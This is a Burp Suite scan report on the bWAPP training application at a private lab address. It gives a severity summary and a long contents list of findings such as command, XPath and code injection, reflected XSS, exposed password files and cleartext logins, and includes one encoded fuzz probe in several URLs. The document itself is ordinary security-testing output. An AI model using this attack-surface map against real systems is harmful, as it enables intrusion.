wAPP Scan Using BurpSuite

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

    Confidence
    Certain Firm Tentative Total
Severity High 17 156 0 173
Medium 6 3 6 15
Low 405 23 1 429
Information 510 233 125 868

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

    Number of issues
    0 50 100 150 200 250 300 350 400 450
Severity High
 
Medium
 
Low
 

Contents

1. OS command injection

2. XPath injection

2.1. http://192.168.52.147/bWAPP/ [Referer HTTP header]

2.2. http://192.168.52.147/bWAPP/ [User-Agent HTTP header]

2.3. http://192.168.52.147/bWAPP/ [name of an arbitrarily supplied URL parameter]

2.4. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [Base64-decoded value of the secret cookie]

2.5. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [Referer HTTP header]

2.6. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [User-Agent HTTP header]

2.7. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [admin cookie]

2.8. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [bug parameter]

2.9. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [form_bug parameter]

2.10. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [form_security_level parameter]

2.11. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied URL parameter]

2.12. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied body parameter]

2.13. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [secret cookie]

2.14. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [security_level cookie]

2.15. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [security_level parameter]

2.16. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [top_security_nossl cookie]

2.17. http://192.168.52.147/bWAPP/ba_forgotten.php [Base64-decoded value of the secret cookie]

2.18. http://192.168.52.147/bWAPP/ba_forgotten.php [Referer HTTP header]

2.19. http://192.168.52.147/bWAPP/ba_forgotten.php [User-Agent HTTP header]

2.20. http://192.168.52.147/bWAPP/ba_forgotten.php [admin cookie]

2.21. http://192.168.52.147/bWAPP/ba_forgotten.php [bug parameter]

2.22. http://192.168.52.147/bWAPP/ba_forgotten.php [form_bug parameter]

2.23. http://192.168.52.147/bWAPP/ba_forgotten.php [form_security_level parameter]

2.24. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied URL parameter]

2.25. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied body parameter]

2.26. http://192.168.52.147/bWAPP/ba_forgotten.php [secret cookie]

2.27. http://192.168.52.147/bWAPP/ba_forgotten.php [security_level cookie]

2.28. http://192.168.52.147/bWAPP/ba_forgotten.php [security_level parameter]

2.29. http://192.168.52.147/bWAPP/ba_forgotten.php [top_security_nossl cookie]

2.30. http://192.168.52.147/bWAPP/ba_insecure_login.php [Base64-decoded value of the secret cookie]

2.31. http://192.168.52.147/bWAPP/ba_insecure_login.php [Referer HTTP header]

2.32. http://192.168.52.147/bWAPP/ba_insecure_login.php [User-Agent HTTP header]

2.33. http://192.168.52.147/bWAPP/ba_insecure_login.php [admin cookie]

2.34. http://192.168.52.147/bWAPP/ba_insecure_login.php [name of an arbitrarily supplied URL parameter]

2.35. http://192.168.52.147/bWAPP/ba_insecure_login.php [secret cookie]

2.36. http://192.168.52.147/bWAPP/ba_insecure_login.php [security_level cookie]

2.37. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [Base64-decoded value of the secret cookie]

2.38. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [Referer HTTP header]

2.39. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [User-Agent HTTP header]

2.40. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [admin cookie]

2.41. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [bug parameter]

2.42. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [form_bug parameter]

2.43. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [form_security_level parameter]

2.44. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [movie_genre cookie]

2.45. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied URL parameter]

2.46. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied body parameter]

2.47. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [secret cookie]

2.48. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [security_level cookie]

2.49. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [security_level parameter]

2.50. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [Base64-decoded value of the secret cookie]

2.51. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [Referer HTTP header]

2.52. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [User-Agent HTTP header]

2.53. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [admin cookie]

2.54. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [name of an arbitrarily supplied URL parameter]

2.55. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [secret cookie]

2.56. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [security_level cookie]

2.57. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [Base64-decoded value of the secret cookie]

2.58. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [Referer HTTP header]

2.59. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [User-Agent HTTP header]

2.60. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [admin cookie]

2.61. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [bug parameter]

2.62. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [form_bug parameter]

2.63. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [form_security_level parameter]

2.64. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [movie_genre cookie]

2.65. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied URL parameter]

2.66. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied body parameter]

2.67. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [secret cookie]

2.68. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [security_level cookie]

2.69. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [security_level parameter]

2.70. http://192.168.52.147/bWAPP/ba_weak_pwd.php [Base64-decoded value of the secret cookie]

2.71. http://192.168.52.147/bWAPP/ba_weak_pwd.php [Referer HTTP header]

2.72. http://192.168.52.147/bWAPP/ba_weak_pwd.php [User-Agent HTTP header]

2.73. http://192.168.52.147/bWAPP/ba_weak_pwd.php [admin cookie]

2.74. http://192.168.52.147/bWAPP/ba_weak_pwd.php [bug parameter]

2.75. http://192.168.52.147/bWAPP/ba_weak_pwd.php [form_bug parameter]

2.76. http://192.168.52.147/bWAPP/ba_weak_pwd.php [form_security_level parameter]

2.77. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied URL parameter]

2.78. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied body parameter]

2.79. http://192.168.52.147/bWAPP/ba_weak_pwd.php [secret cookie]

2.80. http://192.168.52.147/bWAPP/ba_weak_pwd.php [security_level cookie]

2.81. http://192.168.52.147/bWAPP/ba_weak_pwd.php [security_level parameter]

2.82. http://192.168.52.147/bWAPP/ba_weak_pwd.php [top_security_nossl cookie]

2.83. http://192.168.52.147/bWAPP/bof_1.php [Base64-decoded value of the secret cookie]

2.84. http://192.168.52.147/bWAPP/bof_1.php [Referer HTTP header]

2.85. http://192.168.52.147/bWAPP/bof_1.php [User-Agent HTTP header]

2.86. http://192.168.52.147/bWAPP/bof_1.php [admin cookie]

2.87. http://192.168.52.147/bWAPP/bof_1.php [bug parameter]

2.88. http://192.168.52.147/bWAPP/bof_1.php [form_bug parameter]

2.89. http://192.168.52.147/bWAPP/bof_1.php [form_security_level parameter]

2.90. http://192.168.52.147/bWAPP/bof_1.php [movie_genre cookie]

2.91. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied URL parameter]

2.92. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied body parameter]

2.93. http://192.168.52.147/bWAPP/bof_1.php [secret cookie]

2.94. http://192.168.52.147/bWAPP/bof_1.php [security_level cookie]

2.95. http://192.168.52.147/bWAPP/bof_1.php [security_level parameter]

2.96. http://192.168.52.147/bWAPP/bof_2.php [Base64-decoded value of the secret cookie]

2.97. http://192.168.52.147/bWAPP/bof_2.php [Referer HTTP header]

2.98. http://192.168.52.147/bWAPP/bof_2.php [User-Agent HTTP header]

2.99. http://192.168.52.147/bWAPP/bof_2.php [admin cookie]

2.100. http://192.168.52.147/bWAPP/bof_2.php [bug parameter]

2.101. http://192.168.52.147/bWAPP/bof_2.php [form_bug parameter]

2.102. http://192.168.52.147/bWAPP/bof_2.php [form_security_level parameter]

2.103. http://192.168.52.147/bWAPP/bof_2.php [movie_genre cookie]

2.104. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied URL parameter]

2.105. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied body parameter]

2.106. http://192.168.52.147/bWAPP/bof_2.php [secret cookie]

2.107. http://192.168.52.147/bWAPP/bof_2.php [security_level cookie]

2.108. http://192.168.52.147/bWAPP/bof_2.php [security_level parameter]

2.109. http://192.168.52.147/bWAPP/clickjacking.php [Base64-decoded value of the secret cookie]

2.110. http://192.168.52.147/bWAPP/clickjacking.php [Referer HTTP header]

2.111. http://192.168.52.147/bWAPP/clickjacking.php [User-Agent HTTP header]

2.112. http://192.168.52.147/bWAPP/clickjacking.php [bug parameter]

2.113. http://192.168.52.147/bWAPP/clickjacking.php [form_bug parameter]

2.114. http://192.168.52.147/bWAPP/clickjacking.php [form_security_level parameter]

2.115. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied URL parameter]

2.116. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied body parameter]

2.117. http://192.168.52.147/bWAPP/clickjacking.php [secret cookie]

2.118. http://192.168.52.147/bWAPP/clickjacking.php [security_level cookie]

2.119. http://192.168.52.147/bWAPP/clickjacking.php [security_level parameter]

2.120. http://192.168.52.147/bWAPP/commandi.php [bug parameter]

2.121. http://192.168.52.147/bWAPP/commandi.php [form_bug parameter]

2.122. http://192.168.52.147/bWAPP/commandi.php [form_security_level parameter]

2.123. http://192.168.52.147/bWAPP/commandi.php [name of an arbitrarily supplied body parameter]

2.124. http://192.168.52.147/bWAPP/commandi.php [security_level cookie]

2.125. http://192.168.52.147/bWAPP/commandi.php [security_level parameter]

2.126. http://192.168.52.147/bWAPP/login.php [PHPSESSID cookie]

2.127. http://192.168.52.147/bWAPP/login.php [Referer HTTP header]

2.128. http://192.168.52.147/bWAPP/login.php [User-Agent HTTP header]

2.129. http://192.168.52.147/bWAPP/login.php [form parameter]

2.130. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied URL parameter]

2.131. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied body parameter]

2.132. http://192.168.52.147/bWAPP/login.php [security_level parameter]

2.133. http://192.168.52.147/bWAPP/sqli_1.php [Base64-decoded value of the secret cookie]

2.134. http://192.168.52.147/bWAPP/sqli_1.php [Referer HTTP header]

2.135. http://192.168.52.147/bWAPP/sqli_1.php [User-Agent HTTP header]

2.136. http://192.168.52.147/bWAPP/sqli_1.php [admin cookie]

2.137. http://192.168.52.147/bWAPP/sqli_1.php [bug parameter]

2.138. http://192.168.52.147/bWAPP/sqli_1.php [form_bug parameter]

2.139. http://192.168.52.147/bWAPP/sqli_1.php [form_security_level parameter]

2.140. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied URL parameter]

2.141. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied body parameter]

2.142. http://192.168.52.147/bWAPP/sqli_1.php [secret cookie]

2.143. http://192.168.52.147/bWAPP/sqli_1.php [security_level cookie]

2.144. http://192.168.52.147/bWAPP/sqli_1.php [security_level parameter]

2.145. http://192.168.52.147/bWAPP/sqli_1.php [top_security_nossl cookie]

2.146. http://192.168.52.147/bWAPP/xmli_1.php [admin cookie]

2.147. http://192.168.52.147/bWAPP/xmli_1.php [bug parameter]

2.148. http://192.168.52.147/bWAPP/xmli_1.php [form_bug parameter]

2.149. http://192.168.52.147/bWAPP/xmli_1.php [secret cookie]

2.150. http://192.168.52.147/bWAPP/xmli_1.php [security_level cookie]

2.151. http://192.168.52.147/bWAPP/xss_eval.php [bug parameter]

2.152. http://192.168.52.147/bWAPP/xss_eval.php [form_bug parameter]

3. Cross-site scripting (reflected)

3.1. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]

3.2. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]

4. Cleartext submission of password

4.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

4.2. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

4.3. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

4.4. http://192.168.52.147/bWAPP/ba_weak_pwd.php

4.5. http://192.168.52.147/bWAPP/http_verb_tampering.php

4.6. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

4.7. http://192.168.52.147/bWAPP/ldap_connect.php

4.8. http://192.168.52.147/bWAPP/login.php

4.9. http://192.168.52.147/bWAPP/password_change.php

4.10. http://192.168.52.147/bWAPP/sqli_16.php

4.11. http://192.168.52.147/bWAPP/sqli_3.php

4.12. http://192.168.52.147/bWAPP/user_extra.php

4.13. http://192.168.52.147/bWAPP/user_new.php

4.14. http://192.168.52.147/bWAPP/xmli_1.php

4.15. http://192.168.52.147/bWAPP/xss_login.php

5. Code injection

5.1. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh [User-Agent HTTP header]

5.2. http://192.168.52.147/bWAPP/clickjacking.php [bug parameter]

5.3. http://192.168.52.147/bWAPP/commandi.php [Referer HTTP header]

6. Session token in URL

7. Database connection string disclosed

8. The file 'sqli_10-1.php' includes a vulnerable version of the library 'jquery'

8.1. http://192.168.52.147/bWAPP/sqli_10-1.php

8.2. http://192.168.52.147/bWAPP/sqli_10-1.php

8.3. http://192.168.52.147/bWAPP/sqli_10-1.php

9. Host header poisoning

9.1. http://192.168.52.147/bWAPP/aim.php [PHPSESSID cookie]

9.2. http://192.168.52.147/bWAPP/fonts/ [security_level cookie]

9.3. http://192.168.52.147/bWAPP/logs/ [PHPSESSID cookie]

9.4. http://192.168.52.147/bWAPP/passwords/ [PHPSESSID cookie]

9.5. http://192.168.52.147/bWAPP/passwords/accounts.txt [PHPSESSID cookie]

9.6. http://192.168.52.147/bWAPP/ws_soap.php [PHPSESSID cookie]

10. The file 'jquery-1.4.4.min.js' includes a vulnerable version of the library 'jquery'

10.1. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

10.2. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

10.3. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

11. Interesting input handling: Shell injection

12. Password submitted using GET method

12.1. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

12.2. http://192.168.52.147/bWAPP/xmli_1.php

13. Cookie without HttpOnly flag set

13.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

13.2. http://192.168.52.147/bWAPP/ba_forgotten.php

13.3. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

13.4. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

13.5. http://192.168.52.147/bWAPP/ba_weak_pwd.php

13.6. http://192.168.52.147/bWAPP/bof_1.php

13.7. http://192.168.52.147/bWAPP/bof_2.php

13.8. http://192.168.52.147/bWAPP/captcha_box.php

13.9. http://192.168.52.147/bWAPP/clickjacking.php

13.10. http://192.168.52.147/bWAPP/commandi.php

13.11. http://192.168.52.147/bWAPP/login.php

13.12. http://192.168.52.147/bWAPP/portal.php

13.13. http://192.168.52.147/bWAPP/sqli_1.php

13.14. http://192.168.52.147/bWAPP/sqli_10-1.php

13.15. http://192.168.52.147/bWAPP/xmli_1.php

13.16. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

13.17. http://192.168.52.147/bWAPP/xss_stored_2.php

14. Password field with autocomplete enabled

14.1. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

14.2. http://192.168.52.147/bWAPP/http_verb_tampering.php

14.3. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

14.4. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

14.5. http://192.168.52.147/bWAPP/password_change.php

14.6. http://192.168.52.147/bWAPP/sm_mitm_1.php

14.7. http://192.168.52.147/bWAPP/user_extra.php

14.8. http://192.168.52.147/bWAPP/user_new.php

15. Source code disclosure

16. Content type incorrectly stated

16.1. http://192.168.52.147/bWAPP/fonts/arial.ttf

16.2. http://192.168.52.147/bWAPP/fonts/arialbd.ttf

16.3. http://192.168.52.147/bWAPP/fonts/arialbi.ttf

16.4. http://192.168.52.147/bWAPP/fonts/ariali.ttf

16.5. http://192.168.52.147/bWAPP/fonts/ariblk.ttf

16.6. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf

16.7. http://192.168.52.147/bWAPP/fonts/backlash.gdf

16.8. http://192.168.52.147/bWAPP/restrict_folder_access.php

17. Metadata in PDF File(s)

17.1. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.2. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.3. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.4. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.5. http://192.168.52.147/bWAPP/restrict_folder_access.php

17.6. http://192.168.52.147/bWAPP/restrict_folder_access.php

18. Content Sniffing not disabled

18.1. http://192.168.52.147/bWAPP/

18.2. http://192.168.52.147/bWAPP/666

18.3. http://192.168.52.147/bWAPP/admin/

18.4. http://192.168.52.147/bWAPP/admin/index.php

18.5. http://192.168.52.147/bWAPP/admin/phpinfo.php

18.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/

18.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/

18.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/

18.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

18.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

18.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

18.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

18.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

18.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

18.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

18.16. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

18.17. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

18.18. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

18.19. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

18.20. http://192.168.52.147/bWAPP/aim.php

18.21. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

18.22. http://192.168.52.147/bWAPP/ba_forgotten.php

18.23. http://192.168.52.147/bWAPP/ba_insecure_login.php

18.24. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

18.25. http://192.168.52.147/bWAPP/ba_pwd_attacks.php

18.26. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

18.27. http://192.168.52.147/bWAPP/ba_weak_pwd.php

18.28. http://192.168.52.147/bWAPP/bof_1.php

18.29. http://192.168.52.147/bWAPP/bof_2.php

18.30. http://192.168.52.147/bWAPP/captcha_box.php

18.31. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh

18.32. http://192.168.52.147/bWAPP/clickjacking.php

18.33. http://192.168.52.147/bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

18.34. http://192.168.52.147/bWAPP/commandi.php

18.35. http://192.168.52.147/bWAPP/commandi.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

18.36. http://192.168.52.147/bWAPP/commandi_blind.php

18.37. http://192.168.52.147/bWAPP/credits.php

18.38. http://192.168.52.147/bWAPP/csrf_2.php

18.39. http://192.168.52.147/bWAPP/csrf_3.php

18.40. http://192.168.52.147/bWAPP/directory_traversal_1.php

18.41. http://192.168.52.147/bWAPP/directory_traversal_2.php

18.42. http://192.168.52.147/bWAPP/fonts/

18.43. http://192.168.52.147/bWAPP/fonts/arial.ttf

18.44. http://192.168.52.147/bWAPP/fonts/arialbd.ttf

18.45. http://192.168.52.147/bWAPP/fonts/arialbi.ttf

18.46. http://192.168.52.147/bWAPP/fonts/ariali.ttf

18.47. http://192.168.52.147/bWAPP/fonts/ariblk.ttf

18.48. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf

18.49. http://192.168.52.147/bWAPP/fonts/backlash.gdf

18.50. http://192.168.52.147/bWAPP/fonts/hootie.gdf

18.51. http://192.168.52.147/bWAPP/heartbleed.php

18.52. http://192.168.52.147/bWAPP/hostheader_1.php

18.53. http://192.168.52.147/bWAPP/hostheader_2.php

18.54. http://192.168.52.147/bWAPP/hpp-1.php

18.55. http://192.168.52.147/bWAPP/hpp-2.php

18.56. http://192.168.52.147/bWAPP/hpp-3.php

18.57. http://192.168.52.147/bWAPP/htmli_current_url.php

18.58. http://192.168.52.147/bWAPP/htmli_get.php

18.59. http://192.168.52.147/bWAPP/htmli_post.php

18.60. http://192.168.52.147/bWAPP/htmli_stored.php

18.61. http://192.168.52.147/bWAPP/http_response_splitting.php

18.62. http://192.168.52.147/bWAPP/http_verb_tampering.php

18.63. http://192.168.52.147/bWAPP/iframei.php

18.64. http://192.168.52.147/bWAPP/images/

18.65. http://192.168.52.147/bWAPP/images/file.txt

18.66. http://192.168.52.147/bWAPP/images/spider.swf

18.67. http://192.168.52.147/bWAPP/info.php

18.68. http://192.168.52.147/bWAPP/information_disclosure_1.php

18.69. http://192.168.52.147/bWAPP/information_disclosure_2.php

18.70. http://192.168.52.147/bWAPP/information_disclosure_3.php

18.71. http://192.168.52.147/bWAPP/information_disclosure_4.php

18.72. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php

18.73. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

18.74. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

18.75. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php

18.76. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php

18.77. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php

18.78. http://192.168.52.147/bWAPP/insecure_iframe.php

18.79. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php

18.80. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php

18.81. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_3.php

18.82. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_4.php

18.83. http://192.168.52.147/bWAPP/js/

18.84. http://192.168.52.147/bWAPP/js/html5.js

18.85. http://192.168.52.147/bWAPP/js/jquery-1.4.4.min.js

18.86. http://192.168.52.147/bWAPP/js/json2.js

18.87. http://192.168.52.147/bWAPP/js/xss_ajax_1.js

18.88. http://192.168.52.147/bWAPP/ldap_connect.php

18.89. http://192.168.52.147/bWAPP/ldapi.php

18.90. http://192.168.52.147/bWAPP/lfi_sqlitemanager.php

18.91. http://192.168.52.147/bWAPP/login.php

18.92. http://192.168.52.147/bWAPP/logout.php

18.93. http://192.168.52.147/bWAPP/logs/

18.94. http://192.168.52.147/bWAPP/logs/visitors.txt

18.95. http://192.168.52.147/bWAPP/maili.php

18.96. http://192.168.52.147/bWAPP/manual_interv.php

18.97. http://192.168.52.147/bWAPP/password_change.php

18.98. http://192.168.52.147/bWAPP/passwords/

18.99. http://192.168.52.147/bWAPP/passwords/accounts.txt

18.100. http://192.168.52.147/bWAPP/passwords/heroes.xml

18.101. http://192.168.52.147/bWAPP/passwords/web.config.bak

18.102. http://192.168.52.147/bWAPP/passwords/wp-config.bak

18.103. http://192.168.52.147/bWAPP/php_cgi.php

18.104. http://192.168.52.147/bWAPP/php_eval.php

18.105. http://192.168.52.147/bWAPP/phpi.php

18.106. http://192.168.52.147/bWAPP/phpi_sqlitemanager.php

18.107. http://192.168.52.147/bWAPP/portal.php

18.108. http://192.168.52.147/bWAPP/reset.php

18.109. http://192.168.52.147/bWAPP/restrict_device_access.php

18.110. http://192.168.52.147/bWAPP/restrict_folder_access.php

18.111. http://192.168.52.147/bWAPP/rlfi.php

18.112. http://192.168.52.147/bWAPP/robots.txt

18.113. http://192.168.52.147/bWAPP/secret-cors-2.php

18.114. http://192.168.52.147/bWAPP/secret.php

18.115. http://192.168.52.147/bWAPP/secret_html.php

18.116. http://192.168.52.147/bWAPP/security_level_set.php

18.117. http://192.168.52.147/bWAPP/shellshock.php

18.118. http://192.168.52.147/bWAPP/sm_cors.php

18.119. http://192.168.52.147/bWAPP/sm_cross_domain_policy.php

18.120. http://192.168.52.147/bWAPP/sm_dos_1.php

18.121. http://192.168.52.147/bWAPP/sm_dos_3.php

18.122. http://192.168.52.147/bWAPP/sm_dos_4.php

18.123. http://192.168.52.147/bWAPP/sm_ftp.php

18.124. http://192.168.52.147/bWAPP/sm_local_priv_esc_1.php

18.125. http://192.168.52.147/bWAPP/sm_local_priv_esc_2.php

18.126. http://192.168.52.147/bWAPP/sm_mitm_1.php

18.127. http://192.168.52.147/bWAPP/sm_mitm_2.php

18.128. http://192.168.52.147/bWAPP/sm_robots.php

18.129. http://192.168.52.147/bWAPP/sm_samba.php

18.130. http://192.168.52.147/bWAPP/sm_snmp.php

18.131. http://192.168.52.147/bWAPP/sm_webdav.php

18.132. http://192.168.52.147/bWAPP/sm_xst.php

18.133. http://192.168.52.147/bWAPP/smgmt_admin_portal.php

18.134. http://192.168.52.147/bWAPP/smgmt_cookies_httponly.php

18.135. http://192.168.52.147/bWAPP/smgmt_cookies_secure.php

18.136. http://192.168.52.147/bWAPP/smgmt_sessionid_url.php

18.137. http://192.168.52.147/bWAPP/smgmt_strong_sessions.php

18.138. http://192.168.52.147/bWAPP/sqli_1.php

18.139. http://192.168.52.147/bWAPP/sqli_10-1.php

18.140. http://192.168.52.147/bWAPP/sqli_11.php

18.141. http://192.168.52.147/bWAPP/sqli_12.php

18.142. http://192.168.52.147/bWAPP/sqli_13.php

18.143. http://192.168.52.147/bWAPP/sqli_14.php

18.144. http://192.168.52.147/bWAPP/sqli_15.php

18.145. http://192.168.52.147/bWAPP/sqli_16.php

18.146. http://192.168.52.147/bWAPP/sqli_17.php

18.147. http://192.168.52.147/bWAPP/sqli_2.php

18.148. http://192.168.52.147/bWAPP/sqli_3.php

18.149. http://192.168.52.147/bWAPP/sqli_4.php

18.150. http://192.168.52.147/bWAPP/sqli_5.php

18.151. http://192.168.52.147/bWAPP/sqli_6.php

18.152. http://192.168.52.147/bWAPP/sqli_7.php

18.153. http://192.168.52.147/bWAPP/sqli_8-1.php

18.154. http://192.168.52.147/bWAPP/sqli_9.php

18.155. http://192.168.52.147/bWAPP/sqli_drupal.php

18.156. http://192.168.52.147/bWAPP/ssii.php

18.157. http://192.168.52.147/bWAPP/ssii.shtml

18.158. http://192.168.52.147/bWAPP/ssrf.php

18.159. http://192.168.52.147/bWAPP/stylesheets/

18.160. http://192.168.52.147/bWAPP/top_security.php

18.161. http://192.168.52.147/bWAPP/training.php

18.162. http://192.168.52.147/bWAPP/unrestricted_file_upload.php

18.163. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_1.php

18.164. http://192.168.52.147/bWAPP/unvalidated_redir_fwd_2.php

18.165. http://192.168.52.147/bWAPP/user_extra.php

18.166. http://192.168.52.147/bWAPP/user_new.php

18.167. http://192.168.52.147/bWAPP/ws_soap.php

18.168. http://192.168.52.147/bWAPP/xmli_1.php

18.169. http://192.168.52.147/bWAPP/xmli_2.php

18.170. http://192.168.52.147/bWAPP/xss_ajax_1-1.php

18.171. http://192.168.52.147/bWAPP/xss_ajax_2-1.php

18.172. http://192.168.52.147/bWAPP/xss_back_button.php

18.173. http://192.168.52.147/bWAPP/xss_custom_header.php

18.174. http://192.168.52.147/bWAPP/xss_eval.php

18.175. http://192.168.52.147/bWAPP/xss_get.php

18.176. http://192.168.52.147/bWAPP/xss_href-1.php

18.177. http://192.168.52.147/bWAPP/xss_href-2.php

18.178. http://192.168.52.147/bWAPP/xss_href-3.php

18.179. http://192.168.52.147/bWAPP/xss_json.php

18.180. http://192.168.52.147/bWAPP/xss_login.php

18.181. http://192.168.52.147/bWAPP/xss_php_self.php

